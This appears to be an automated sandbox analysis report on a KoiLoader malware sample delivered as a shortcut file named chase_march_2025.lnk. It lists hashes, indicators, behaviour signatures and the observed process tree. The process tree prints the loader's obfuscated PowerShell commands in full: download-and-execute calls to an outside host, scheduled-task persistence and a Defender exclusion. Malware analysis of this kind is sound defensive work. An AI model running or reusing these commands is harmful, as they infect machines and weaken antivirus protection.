Analysis
-
max time kernel
144s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 10:01
Static task
static1
Behavioral task
behavioral1
Sample
chase_march_2025.lnk
Resource
win10v2004-20250314-en
General
-
Target
chase_march_2025.lnk
-
Size
1KB
-
MD5
c8819ed5f7f4a9b309e01db14b458a60
-
SHA1
1b78c2b3627814971f73c7fa2696d1119154ea07
-
SHA256
5d736786036eeeaeb7a7c8b3652c76ca4c61a845619004e0b9bb679971da6a48
-
SHA512
72e7d619453b60df925f2f593bb9ff3156c717e97354f1de6025f9de67c8ec7713dccc01988928072b271f20eca35168023fed06f084376db47b2a07be424f78
Malware Config
Extracted
https://studiolegaledesanctis.eu/wp-content/uploads/2024/07
Extracted
koiloader
http://217.156.66.15/gnathopoda.php
-
payload_url
https://studiolegaledesanctis.eu/wp-content/uploads/2024/07
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral1/memory/964-56-0x0000000007A50000-0x0000000007A5D000-memory.dmp family_koi_loader -
Blocklisted process makes network request 6 IoCs
flow pid Process 7 2260 powershell.exe 64 964 powershell.exe 70 964 powershell.exe 72 3024 powershell.exe 73 3024 powershell.exe 76 964 powershell.exe -
pid Process 964 powershell.exe 2768 powershell.exe 3024 powershell.exe 2260 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation wscript.EXE -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 4184 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4740 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2260 powershell.exe 2260 powershell.exe 4184 powershell.exe 4184 powershell.exe 964 powershell.exe 964 powershell.exe 2768 powershell.exe 2768 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 5492 wrote to memory of 2260 5492 cmd.exe 88 PID 5492 wrote to memory of 2260 5492 cmd.exe 88 PID 2260 wrote to memory of 4556 2260 powershell.exe 92 PID 2260 wrote to memory of 4556 2260 powershell.exe 92 PID 2260 wrote to memory of 4740 2260 powershell.exe 93 PID 2260 wrote to memory of 4740 2260 powershell.exe 93 PID 5732 wrote to memory of 4184 5732 wscript.EXE 111 PID 5732 wrote to memory of 4184 5732 wscript.EXE 111 PID 4184 wrote to memory of 1800 4184 powershell.exe 113 PID 4184 wrote to memory of 1800 4184 powershell.exe 113 PID 4184 wrote to memory of 3708 4184 powershell.exe 114 PID 4184 wrote to memory of 3708 4184 powershell.exe 114 PID 3708 wrote to memory of 964 3708 wscript.exe 115 PID 3708 wrote to memory of 964 3708 wscript.exe 115 PID 3708 wrote to memory of 964 3708 wscript.exe 115 PID 4800 wrote to memory of 3256 4800 DllHost.exe 118 PID 4800 wrote to memory of 3256 4800 DllHost.exe 118 PID 4800 wrote to memory of 3256 4800 DllHost.exe 118 PID 3256 wrote to memory of 2768 3256 cmd.exe 120 PID 3256 wrote to memory of 2768 3256 cmd.exe 120 PID 3256 wrote to memory of 2768 3256 cmd.exe 120 PID 964 wrote to memory of 3232 964 powershell.exe 121 PID 964 wrote to memory of 3232 964 powershell.exe 121 PID 964 wrote to memory of 3232 964 powershell.exe 121 PID 3232 wrote to memory of 3024 3232 cmd.exe 123 PID 3232 wrote to memory of 3024 3232 cmd.exe 123 PID 3232 wrote to memory of 3024 3232 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\chase_march_2025.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('1o6gjltxwxrjzt.js w2tvvf08m'); $getf='Dow'+'nl'+'oadF'+'ile'; $ri6muz5x1g1rk = New-Object Net.WebClient; $wscs = 'wscript '; $ri6muz5x1g1rk.$getf('https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/ventage3a.php', '1o6gjltxwxrjzt.js'); . ('curl.e'+'xe') -s -o fv8jwiyi037p 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/caginessEBuk.php'; mv fv8jwiyi037p 'w2tvvf08m.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $pdw) /tn w2tvvf08m;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -s -o fv8jwiyi037p https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/caginessEBuk.php3⤵PID:4556
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\1o6gjltxwxrjzt.js w2tvvf08m" /tn w2tvvf08m3⤵
- Scheduled Task/Job: Scheduled Task
PID:4740
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\ProgramData\1o6gjltxwxrjzt.js w2tvvf08m1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn w2tvvf08m /f; wscript $env:programdata\w2tvvf08m.js "2⤵
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn w2tvvf08m /f3⤵PID:1800
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\w2tvvf08m.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7z8XUB5YTJO6'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/uratic58o.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/shepherdess1Hwn.ps1'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://studiolegaledesanctis.eu/wp-content/uploads/2024/07/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r63e48d52-8c45-4cbc-90d9-6336485f78d0r.js"1⤵PID:4948
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD5af9f1f2076317c03e21d56367e638af4
SHA161c4f850591f851acd3108104ef14f0fe32f95a6
SHA25670835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1
SHA512c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c
-
Filesize
1KB
MD506bd7bbc1b36659a844105b87bea147b
SHA1085a01d4d97ad09c1de33c6a45a1b9d7a5d9af94
SHA256cbd2a12713f5b0dd342ae001e687277bc0851dfaa03545658641eaad99e35d0a
SHA5124950af7ee1d0e1ab236587c550154d5a3fa41bb87aaee210156aab2a82d8009812d64c74187532b0774a20ab27685dcb5b34476b0d5f55c8bc611cc2f015e329
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
354B
MD5d22775e9a7413a789c004e3384774a3c
SHA1acbcf25b45fab3438165a24ae5bf242a28f8fca8
SHA256dde563011b843fecaa678f7406db5f9fd7f98965d42d5017fd56df182beb2b40
SHA512eb28f7f541ce6640803445f9ebc3267510d14d58a8fde24af43534da5769b60958682b8182e59e37094865816b0e8b72f625a4ae6f4537356b7b0fe65851e64f
-
Filesize
1KB
MD535951045da307abc976404b5e5347c25
SHA1ce641fe8dc6bd75df45b3c7c90363250f8302a79
SHA256d78525b7cf64caf262079e819e49517c59b25345df5ce8a9f99e50742f86f1b1
SHA51241432863a7e788173f7d3d3823f09e3764056c6a620c97af8d70c56d96a859eb89aa3230ebdc49a2ea41e719ff707ab66f86579ebbf0160e91213f280e03f42f
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82